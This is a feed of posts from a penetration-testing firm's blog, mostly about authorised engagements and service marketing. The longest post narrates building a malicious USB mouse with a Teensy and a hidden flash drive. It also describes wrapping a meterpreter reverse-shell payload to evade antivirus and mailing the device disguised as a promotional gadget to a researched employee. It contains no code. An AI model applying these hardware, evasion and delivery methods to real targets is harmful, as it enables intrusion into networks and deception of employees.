tag:blogger.com,1999:blog-422477430134849438 (updated 2024-03-18T19:54:30.947-07:00)
Netragard's SNOsoft Research Team: The Specialist in Anti-Hacking... delivering High Quality, Realistic Threat Network Penetration Testing services.
Adriel Desautels (http://www.blogger.com/profile/16119732948300414743, noreply@blogger.com)
tag:blogger.com,1999:blog-422477430134849438.post-2832630515254434117 (published 2012-02-19T08:58:00.000-08:00, updated 2014-07-12T19:03:35.453-07:00)
We've Moved!
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjecs_ypXeYx4N-glC5WMPWy3gU1SUjGeE3D1Gf31P5WfYaT6iMfP3MmSvUuN4ufhJYHvRGAz-nMG239HOomCS-b_TXJXtW67hX0ovRqisqf_c1JJGqsakSu86iKQh1aVetUwAtdsiu0F4/s1600/Screen+Shot+2012-02-19+at+12.02.03+PM.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 293px; height: 313px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjecs_ypXeYx4N-glC5WMPWy3gU1SUjGeE3D1Gf31P5WfYaT6iMfP3MmSvUuN4ufhJYHvRGAz-nMG239HOomCS-b_TXJXtW67hX0ovRqisqf_c1JJGqsakSu86iKQh1aVetUwAtdsiu0F4/s400/Screen+Shot+2012-02-19+at+12.02.03+PM.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5710893284058778722" /></a><br />This blog has moved to <a href="http://pentest.netragard.com">http://pentest.netragard.com</a>.
<meta http-equiv="refresh" content="0; url=http://www.netragard.com/blog" />
<div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>
Adriel Desautels
tag:blogger.com,1999:blog-422477430134849438.post-928642630839745752 (published 2011-11-15T15:20:00.001-08:00, updated 2011-11-15T15:20:50.918-08:00)
Netragard’s Badge of Honor (Thank you McAfee)
<div class='posterous_autopost'><p> <p style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif; line-height: 19px;">Here at Netragard We Protect You From People Like Us™ and we mean it. We don’t just run automated scans, massage the output, and draft you a report that makes you feel good; that's what many companies do. Instead, we "hack" you with a methodology that is driven by hands-on research and designed to create realistic and elevated levels of threat. Don’t take our word for it though; McAfee has helped us prove it to the world.</p> <p style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif; line-height: 19px;">Through their Threat Intelligence service, McAfee Labs listed Netragard as a “High Risk” due to the level of threat that we produced during a recent engagement. Specifically, we were using a beta variant of our custom Meterbreter malware (not to be confused with Metasploit’s Meterpreter) during an Advanced Penetration Testing engagement. The beta malware was identified and submitted to McAfee via our customer's Incident Response process. 
The result was that McAfee listed Netragard as a “High Risk”, which caught our attention (and our customer's attention) pretty quickly.</p> <div class="mceTemp mceIEcenter" style="text-align: center; font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif; line-height: 19px;"><dl class="wp-caption aligncenter" style="margin-left: auto; margin-right: auto; background-color: #f3f3f3; padding-top: 4px; margin-top: 10px; margin-bottom: 10px; border-top-left-radius: 3px 3px; border-top-right-radius: 3px 3px; border-bottom-right-radius: 3px 3px; border-bottom-left-radius: 3px 3px; border: 1px solid #dddddd;"><dt class="wp-caption-dt"><a href="http://pentest.snosoft.com/2011/11/15/netragards-badge-of-honor-thank-you-mcafee/unknown/" rel="attachment wp-att-274"><img class="size-large wp-image-274" title="McAfee High Risk" src="http://pentest.snosoft.com/wp-content/uploads//2011/11/Unknown-1024x661.png" height="661" alt="McAfee Flags Netragard as a High Risk" style="border-color: initial; padding: 0px; margin: 0px;" width="1024" /></a></dt><dd class="wp-caption-dd" style="font-size: 11px; line-height: 17px; padding-top: 0px; padding-right: 4px; padding-bottom: 5px; padding-left: 4px; margin: 0px;">Badge of Honor</dd></dl></div> <p style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif; line-height: 19px;">McAfee was absolutely right; we are “High Risk”, or more appropriately, "High Threat", which in our opinion is critically important when delivering quality Penetration Testing services. After all, the purpose of a Penetration Test (with regards to IT security) is to identify the presence of points where a real threat can make its way into or through your IT Infrastructure. 
Testing at less than realistic levels of threat is akin to testing a bulletproof vest with a squirt gun.</p> <p style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif; line-height: 19px;">Netragard uses a methodology that’s been dubbed Real Time Dynamic Testing™ ("RTDT"). Real Time Dynamic Testing™ is a research-driven methodology specifically designed to test the Physical, Electronic (networked and standalone) and Social attack surfaces at a level of threat that is slightly greater than what is likely to be faced in the real world. Real Time Dynamic Testing™ requires that our Penetration Testers be capable of reverse engineering, writing custom exploits, building and modifying malware, etc. In fact, the first rendition of our Meterbreter was created as a product of this methodology.</p> <p style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif; line-height: 19px;">Another important aspect of Real Time Dynamic Testing™ is the targeting of attack surfaces individually or in tandem. The “<a href="http://pentest.snosoft.com/2011/06/24/netragards-hacker-interface-device-hid/" target="_blank">Netragard’s Hacker Interface Device</a>” article is an example of how Real Time Dynamic Testing™ was used to combine Social, Physical and Electronic attacks to achieve compromise against a hardened target. Another article titled “<a href="http://pentest.snosoft.com/2009/02/12/facebook-from-the-hackers-perspective/" target="_blank">Facebook from the hackers perspective</a>” provides an example of socially augmented electronic attacks driven by our methodology.</p> <p style="font-family: Georgia, Times New Roman, Bitstream Charter, Times, serif; line-height: 19px;">It is important that we thank McAfee for two reasons. First, we thank McAfee for responding to our request to be removed from the “High Risk” list so quickly, because the listing was preventing our customers from being able to access our servers. 
Second, and possibly more important, we thank McAfee for putting us on their “High Risk” list in the first place. The mere fact that we were perceived as a “High Risk” by McAfee means that we are doing our job right.</p> </p></div>
Adriel Desautels
tag:blogger.com,1999:blog-422477430134849438.post-1986098455649017061 (published 2011-06-24T09:51:00.001-07:00, updated 2011-06-24T09:51:48.667-07:00)
Netragard's Hacker Interface Device (HID)
<div class='posterous_autopost'><p><span style="font-family: Lucida Grande, Arial, Helvetica, sans-serif; line-height: 16px; font-size: 16px;"> <div class="post" style="margin-top: 0px; margin-right: 0px; margin-bottom: 30px; margin-left: 0px; font-size: 16px; vertical-align: baseline; background-color: #131313; color: #cccccc; line-height: 22px; padding: 0px; border: 1px solid #1f2223;"> <div class="entry" style="padding-top: 10px; padding-right: 20px; padding-bottom: 0px; padding-left: 20px; font-size: 13px; vertical-align: baseline; background-color: transparent; margin: 0px;"> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">We (<a href="http://www.netragard.com/" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">Netragard</a>) recently completed an engagement for a client with a rather restricted scope. The scope included a single IP address bound to a firewall that offered no services whatsoever. It also excluded the use of social attack vectors based on social networks, telephone, or email and disallowed any physical access to the campus and surrounding areas. 
With all of these limitations in place, we were tasked with penetrating into the network from the perspective of a remote threat, and succeeded.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">The first method of attack that people might think of when faced with a challenge like this is the use of traditional autorun malware on a USB stick. Just mail a bunch of sticks to different people within the target company and wait for someone to plug one in; when they do, it's game over, <a href="http://www.youtube.com/watch?v=rI-pct3zy18" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">they’re infected</a>. That trick worked great back in the day, but not so much any more. The first issue is that most people are well aware of the USB stick threat due to the many published <a href="http://www.eetimes.com/electronics-news/4080241/Security-alert-Beware-of-USB-memory-sticks" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">articles about the subject</a>. The second is that more and more companies are pushing out group policies that disable the autorun feature in Windows systems. 
Those two things don’t eliminate the USB stick threat, but they certainly have a significant impact on its level of success and we wanted something more reliable.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">Enter PRION, the evil HID.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;"><img class="aligncenter size-full wp-image-228" title="prion" src="http://pentest.snosoft.com/wp-uploads/2011/06/prion.png" height="345" alt="prion" style="margin-top: 0px; margin-right: auto; margin-bottom: 0px; margin-left: auto; font-size: 13px; vertical-align: baseline; background-color: transparent; display: block; padding: 0px;" width="454" /></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">A prion is an infectious agent composed of a protein in a misfolded form. 
In our case the prion isn’t composed of proteins but instead of electronics, which include a <a href="http://www.pjrc.com/teensy/" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">Teensy microcontroller</a>, a micro USB hub (a small one from RadioShack), a mini USB cable (we needed the ends), a micro flash drive (made from one of our Netragard USB Streamers), some home-grown malware (certainly not designed to be destructive), and a USB device like a <a href="http://www.google.com/search?q=USB+toys&um=1&ie=UTF-8&tbm=isch&source=og&sa=N&hl=en&tab=wi&biw=1920&bih=1061" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">mouse, missile turret, dancing stripper, chameleon</a>, or whatever else someone might be tempted to plug in. When they do plug it in, they will be infected by our custom malware and we will use that point of infection to compromise the rest of the network.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">For the purposes of this engagement we chose to use a fancy <a href="http://www.google.com/search?q=logitech+mouse&hl=en&safe=off&authuser=0&biw=1920&bih=1061&prmd=ivnsr&source=lnms&tbm=isch&ei=qu4DTtuuA8W_gQfF1s20DQ&sa=X&oi=mode_link&ct=mode&cd=2&sqi=2&ved=0CBsQ_AUoAQ" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">USB Logitech mouse</a> as our Hacker Interface Device / Attack Platform. To turn our Logitech Human Interface Device into a Hacker Interface Device, we had to make some modifications. 
The first step, of course, was to remove the screw from the bottom of the mouse and pop it open. Once we did that we disconnected the USB cable from the circuit board in the mouse and put that to the side. Then we proceeded to use a Dremel tool to shave away the extra plastic on the inside cover of the mouse (there were all sorts of tabs that we could sacrifice). The removal of the plastic tabs was to make room for the new hardware.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">Once the top of the mouse was gutted and all the unnecessary parts removed, we began to focus on the USB hub. The first thing we had to do was to extract the board from the hub. Doing that is a lot harder than it sounds because the hub that we chose was glued together and we didn’t want to risk breaking the internals by being too rough. After about 15 minutes of prying with a small screwdriver (and repeated accidental hand stabbing) we were able to pull the board out from the plastic housing. We then proceeded to strip the female USB connectors off of the board by heating their respective pins to melt the solder (careful not to burn the board). Once those were extracted we were left with a naked USB hub circuit board that measured about half an inch long and was no wider than a small Bic lighter.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">With the mouse and the USB board prepared we began the process of soldering. The first thing that we did was to take the mini USB cable and cut one of the ends off, leaving about 1 inch of wire near the connector. Then we stripped all plastic off of the connector and stripped a small amount of insulation from the 4 internal wires. 
We soldered those four wires to the USB board, making sure to follow the <a href="http://pinouts.ru/Slots/USB_pinout.shtml" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">right pinout pattern</a>. This is the cable that will plug into the Teensy's mini USB port when we insert the Teensy microcontroller.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">Once that was finished we took the USB cable that came with the mouse and cut the circuit-board connector off the end, leaving 2 inches of wire attached. We stripped the tips of the 4 wires still attached to the connector and soldered those to the USB hub, making sure to follow the pinout pattern mentioned above. This is an important cable as it's the one that connects the USB hub to the mouse. If this cable is not soldered properly and the connections fail, then the mouse will not work. We then took the other piece of the mouse cable (the longer part) and soldered that to the USB board. This is the cable that will connect the mouse to the USB port on the computer.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">At this point we have three cables soldered to the USB hub. Just to recap, those cables are the mouse connector cable, the cable that goes from the mouse to the computer, and the mini USB adapter cable for the Teensy device. The next and most challenging part of this is to solder the USB flash drive to the USB hub. This is important because the USB flash drive is where we store our malware. If the drive isn’t soldered on properly then we won’t be able to store our malware on the drive and the attack would be mostly moot. 
(We say mostly because we could still instruct the mouse to fetch the malware from a website, but that’s not covert.)</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">To solder the flash drive to the USB hub we cut about 2 inches of cable from the mini USB cable whose end we took previously. We stripped the ends of the wires in the cable and carefully soldered them to the correct points on the flash drive. Once that was done we soldered the other ends of the cable to the USB hub. At that point we had everything soldered together and had to fit it all back into the mouse. Assembly was pretty easy because we were careful to use as little material as possible while still giving us the flexibility that we needed. We wrapped the boards and wires in single layers of electrical tape to avoid any shorts. Once everything was plugged in, we tested the devices. The USB drive mounted, the Teensy card was programmable, and the mouse worked.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">Time to give prion the ability to infect…</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">We learned that the client was using McAfee as their antivirus solution because one of their employees was complaining about it on Facebook. Remember, we weren’t allowed to use social networks for social engineering, but we certainly were allowed to do reconnaissance against social networks. With McAfee in our sights we set out to create custom malware for the client (as we do for any client and their respective antivirus solution when needed). 
We wanted our malware to be able to connect back to <a href="http://www.metasploit.com/" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">Metasploit</a> because we love the functionality; we also wanted the capabilities provided by <a href="http://www.nologin.org/Downloads/Papers/meterpreter.pdf" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">meterpreter</a>, but we needed more than that. We needed our malware to be fully undetectable and to subvert the “Do you want to allow this connection” dialogue box entirely. You can’t do that with encoding…</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">To make this happen we created a meterpreter C array with the windows/meterpreter/reverse_tcp_dns payload. We then took that C array, chopped it up and injected it into our own wrapper of sorts. The wrapper used an undocumented (0-day) technique to completely subvert the dialogue box and to evade detection by McAfee. When we ran our tests on a machine running McAfee, the malware ran without a hitch. We should point out that our ability to evade McAfee isn’t any indication of quality and that we can evade any antivirus solution using similar custom attack methodologies. After all, it's impossible to detect something if you don’t know what it is that you are looking for (it also helps to have a team of researchers at our disposal).</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">Once we had our malware built we loaded it onto the flash drive that we soldered into our mouse. 
Then we wrote some code for the Teensy microcontroller to launch the malware 60 seconds after the start of user activity. Much of the code was taken from <a href="http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">Adrian Crenshaw’s website</a>; he deserves credit for giving us this idea in the first place. After a little bit of debugging, our evil mouse named prion was working flawlessly.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;"><strong style="font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px; margin: 0px;">Usage:</strong> Plug mouse into computer, get pwned.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">The last and final step here was to ship the mouse to our customer. One of the most important aspects of this was to repack the mouse in its original package so that it appeared unopened. Then we used <a href="http://www.jigsaw.com/" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">Jigsaw</a> to purchase a list of our client’s employees. We did a bit of reconnaissance on each employee and found a target that looked ideal. We packaged the mouse and made it look like a promotional gadget, added fake marketing flyers, etc., then shipped the mouse. 
Sure enough, three days later the mouse called home.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;"><img class="aligncenter size-full wp-image-231" title="pwned" src="http://pentest.snosoft.com/wp-uploads/2011/06/pwned.png" height="267" alt="pwned" style="margin-top: 0px; margin-right: auto; margin-bottom: 0px; margin-left: auto; font-size: 13px; vertical-align: baseline; background-color: transparent; display: block; padding: 0px;" width="885" /></p> <p /> </div> </div> </span></p></div>
Adriel Desautels
tag:blogger.com,1999:blog-422477430134849438.post-5794997457929403915 (published 2011-02-25T11:40:00.001-08:00, updated 2011-02-25T11:40:13.202-08:00)
Netragard Signage Snatching
<div class='posterous_autopost'><p> <p>Recently Netragard has had a few discussions with owners and operators of sports arenas, with the purpose of identifying methods in which a malicious hacker could potentially disrupt a sporting event, concert, or other large scale and highly visible event.</p> <p>During the course of these conversations, the topic of discussion shifted from network exploitation to social engineering, with a focus on compromise of the digital signage systems. Until recently, even I hadn’t thought about how extensively network controlled signage systems are used in facilities like casinos, sports arenas, airports, and roadside billboards. That is, until our most recent casino project.</p> <p>Netragard recently completed a Network Penetration Test and Social Engineering Test for a large west coast casino, with spectacular results. Not only were our engineers able to gain the keys to the kingdom, they were also able to gain access to the systems that had supervisory control for every single digital sign in the facility. Some people may think to themselves, “ok, what’s the big deal with that?”. The answer is simple: customer perception and corporate image.</p> <p>Before I continue on, let me provide some background: early in 2008, there were two incidents in California where two on-highway digital billboards were compromised and their displays changed from the intended content. While both of these incidents were small pranks in comparison to what they could have done, the effect was remembered by those who drove by and saw the signs. 
(<a href="http://billboardliberation.com/HQ.html" target="_blank">Example A</a>, <a href="http://www.engadget.com/2008/03/25/clear-channel-digital-billboards-in-socal-hax0r3d/" target="_blank">Example B</a>)</p> <p>Another recent billboard hack in Moscow, Russia, wasn’t as polite as the pranksters in California. A hacker was able to gain control of a billboard in downtown Moscow (worth noting, Moscow is the 7th largest city in the world) and, after gaining access, looped a video clip of pornographic material. (<a href="http://www.cbsnews.com/stories/2010/01/15/world/main6100772.shtml" target="_blank">Example C</a>) Imagine if this was a sports organization, and this happened during a major game.</p> <p>Bringing this post back on track, let’s refocus on the casino and the potential impact of signage compromise. After spending time in the signage control server, we determined that there were over 40 unique displays available to control, some of which were over 100″ in display size. With customer permission, we placed a unique image on a small sign for proof of concept purposes (go Google “stallowned”). This test, coupled with an impact audit, clearly highlighted to the casino that securing their signage systems was nearly as important as securing their security systems, cage systems, and domain controllers. All the domain security in the world means little to a customer if they’re presented with disruptive material on the signage during their visit to the casino. A compromise of this nature could cause significant loss of revenue and cause a customer to never re-visit the casino.</p> <p>I also thought it pertinent for the purpose of this post to share another customer engagement story. 
This story highlights how physical security can be compromised by a combination of social engineering and network exploitation, thus opening an additional risk vector that could allow for compromise of the local network running the digital display systems.</p> <p>Netragard was engaged by a large bio-sciences company in late 2010 to assess the network and physical security of multiple locations belonging to a business unit that was a new acquisition. During the course of this engagement, Netragard was able to take complete control of their network infrastructure remotely, as is the case in most of our engagements. More so, our engineers were able to utilize their social engineering skills to “convince” the physical site staff to grant them building access. Once past this first layer of physical access, by combining social and network exploitation, they were subsequently able to gain access to sensitive labs and document storage rooms. These facilities/rooms were key to the organization's intellectual property and on-going research. Had our engineers been hired by a competing company or other entity, there would have been a 100% chance that the IP (research data, trials data, and so forth) could have been spirited off company property and into hands unknown.</p> <p>By combining network exploitation and social engineering, we’ve postulated to the sports arena operators that Netragard has a high probability of gaining access to the control systems for their digital signage. Inevitably, during these discussions the organizations push back, stating that their facilities have trained security staff and access control systems. To that we reply that the majority of sports facilities staff are attuned to illicit access attempts in controlled areas, but only during certain periods of operation, such as active games, concerts, and other large scale events. 
During non-public usage hours, though, there’s a high probability that a skilled individual could gain entry to access-controlled areas during a private event, or through a breach of trust, such as posing as a repair technician, emergency services employee, or even a facility employee.</p> <p>One area of concern for any organization, whether it be a football organization, Fortune 100 company, or a mid-size business, is breach of trust with their consumer base. For a major sports organization, the level of national exposure and endearment far exceeds the exposure most Netragard customers have to the public. Because of this extremely high national exposure, a sports organization and its arena are a prime target for those who may consider highly visible public disruption of games a key tool in furthering a socio-political agenda. We’re hopeful that these organizations will continue to take a more serious stance to ensure that their systems and public image are as protected as possible.</p> </p></div>
Adriel Desautels
tag:blogger.com,1999:blog-422477430134849438.post-5775539787000769135 (published 2011-02-22T19:43:00.001-08:00, updated 2011-02-25T07:44:08.975-08:00)
Quality Penetration Testing by Netragard
<div class="posterous_autopost"><p>The purpose of <a href="http://www.netragard.com/" title="Penetration Testing" target="_blank">Penetration Testing</a> is to identify the presence of points where an external entity can make its way into or through a protected entity. <a href="http://www.netragard.com/" title="Penetration Testing" target="_blank">Penetration Testing</a> is not unique to IT security and is used across a wide variety of different industries. For example, Penetration Tests are used to assess the effectiveness of body armor. This is done by exposing the armor to different munitions that represent the real threat. 
If a projectile penetrates the armor then the armor is revised and improved upon until it can endure the threat.</p> <p><img class="aligncenter" src="http://www.netragard.com/images/img.png" height="284" alt="" width="463" /></p> <p>Network Penetration Testing is a class of Penetration Testing that applies to Information Technology. The purpose of Network Penetration Testing is to identify the presence of points where a threat (defined by the hacker) can align with existing risks to achieve penetration. The accurate identification of these points allows for remediation.</p> <p>Successful penetration by a malicious hacker can result in the compromise of data with respect to Confidentiality, Integrity and Availability (“CIA”). In order to ensure that a Network Penetration Test provides an accurate measure of risk (<strong><span style="color: #ff0000;">risk = probability x impact</span></strong>) the test must be delivered at a threat level that is slightly elevated from that which is likely to be faced in the real world. Testing at a lower than realistic threat level would be akin to testing a bulletproof vest with a squirt gun.</p> <p>Threat levels can be adjusted by adding or removing attack classes. These attack classes are organized under three top-level categories, which are Network Attacks, Social Attacks, and Physical Attacks. Each of the top-level categories can operate in a standalone configuration or can be used to augment the other. For example, Network Penetration Testing with Social Engineering creates a significantly higher level of threat than just Network Penetration Testing or Social Engineering alone. Each of the top-level threat categories contains numerous individual attacks.</p> <p>A well-designed Network Penetration Testing engagement should employ the same attack classes as a real threat. This ensures that testing is realistic which helps to ensure effectiveness. 
All networked entities face threats that include Network and Social attack classes. Despite this fact, most Network Penetration Tests entirely overlook the Social attack class and thus test at radically reduced threat levels. Testing at reduced threat levels defeats the purpose of testing by failing to identify the same level of risks that would likely be identified by the real threat. The level of threat that is produced by a Network Penetration Testing team is one of the primary measures of service quality.</p> <p> </p></div><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com0tag:blogger.com,1999:blog-422477430134849438.post-81231858027836917352011-01-25T17:23:00.001-08:002011-02-25T07:44:32.454-08:00Netragard Challenges your PCI Compliance<div class="posterous_autopost"><p><span style=" line-height: 22px;font-family:Lucida Grande, Arial, Helvetica, sans-serif;color:#cccccc;"> </span></p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; vertical-align: baseline; background- padding: 0px;font-size:13px;color:transparent;"><span class="Apple-style-span" style="color:#FFFFFF;">The purpose of legitimate Network Penetration Testing is to positively identify risks in a targeted IT Infrastructure before those risks are identified and exploited by malicious hackers. This enables the IT managers to remediate against those risks before they become an issue. To accomplish this the Penetration Test must be driven by people with at least the same degree of skill and persistence as the threat (defined by the malicious hacker). If the Penetration Test is delivered with a skill set that is less than that of the real threat then the test will likely be ineffective. 
This would be akin to testing the effectiveness of a bullet-proof vest with a squirt gun.</span></p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; vertical-align: baseline; background- padding: 0px;font-size:13px;color:transparent;"><span class="Apple-style-span" style="color:#FFFFFF;">Unfortunately most penetration tests don’t test at realistic threat levels. This is especially true with regards to PCI based penetration tests. Most PCI based penetration testing companies do the bare minimum required to satisfy PCI requirement 11.3. This is problematic because it results in businesses passing their PCI penetration tests when they should have failed and it promotes a false sense of security. The truth is that most businesses that pass their annual PCI audits are still relatively easy to hack. </span><span class="Apple-style-span" style="color:#FF9966;">If you don’t believe us then </span><a href="http://www.netragard.com/landing-page/pci-compliance-testing-offer.html" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; "><strong style=" vertical-align: baseline; background- padding: 0px; margin: 0px;font-size:13px;color:transparent;"><span class="Apple-style-span" style="color:#FF9966;">let us prove it and hire us (Netragard) to deliver a conditional penetration test</span></strong></a><span class="Apple-style-span" style="color:#FF9966;">.</span><span class="Apple-style-span" style="color:#FFFFFF;"> If we can’t penetrate your network using our unrestricted, advanced methodology then the next test is free. 
</span><strong style=" vertical-align: baseline; background- padding: 0px; margin: 0px;font-size:13px;color:transparent;"><span class="Apple-style-span" style="color:#FFFFFF;">(Challenge ends March 31st, 2011).</span></strong></p> <p></p></div><div class="blogger-post-footer">Netragard, LLC. -- The Specialist in Anti Hacking.</div>Adriel Desautelshttp://www.blogger.com/profile/16119732948300414743noreply@blogger.com2tag:blogger.com,1999:blog-422477430134849438.post-20838468808476605322011-01-16T17:07:00.001-08:002011-02-25T07:45:55.657-08:00Netragard: Connect to Chaos<div class="posterous_autopost"><p><span style="font-family: Lucida Grande, Arial, Helvetica, sans-serif; color: #cccccc; line-height: 22px;"> </span></p><p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">The <a href="http://www.chevrolet.com/volt/" title="Chevy Volt" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">Chevy Volt</a> will be the first car of its type: not because it is a hybrid electric/petrol vehicle, but because GM plans to give each one the company sells its own IP address. The Volt will have no less than 100 microcontrollers running its systems from some 10 million lines of code. This makes some hackers very excited and Adriel Desautels, president of security analysis firm <a href="http://www.netragard.com/" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;">Netragard</a>, very worried. Before now, you needed physical access to reprogram the software inside a car: an ‘air gap’ protected vehicles from remote tampering. The Volt will have no such physical defence. 
Without some kind of electronic protection, Desautels sees cars such as the Volt and its likely competitors becoming ‘hugely vulnerable 5000lb pieces of metal’.</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">Desautels adds: “We are taking systems that were not meant to be exposed to the threats that my team produces and plug it into the internet. Some 14 year old kid will be able to attack your car while you’re driving.”</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;">…</p> <p style="margin-top: 0px; margin-right: 0px; margin-bottom: 20px; margin-left: 0px; font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px;"><strong style="font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px; margin: 0px;">The full article can be found </strong><a href="http://www.newelectronics.co.uk/article/30523/Technology-Watch-Connect-to-chaos.aspx" target="_blank" style="font-size: 13px; vertical-align: baseline; background-color: transparent; text-decoration: none; color: #ff5a00; padding: 0px; margin: 0px;"><strong style="font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px; margin: 0px;">here</strong></a><strong style="font-size: 13px; vertical-align: baseline; background-color: transparent; padding: 0px; margin: 0px;">.</strong></p> <p></p></div><div class="blogger-post-footer">Netragard, LLC. 
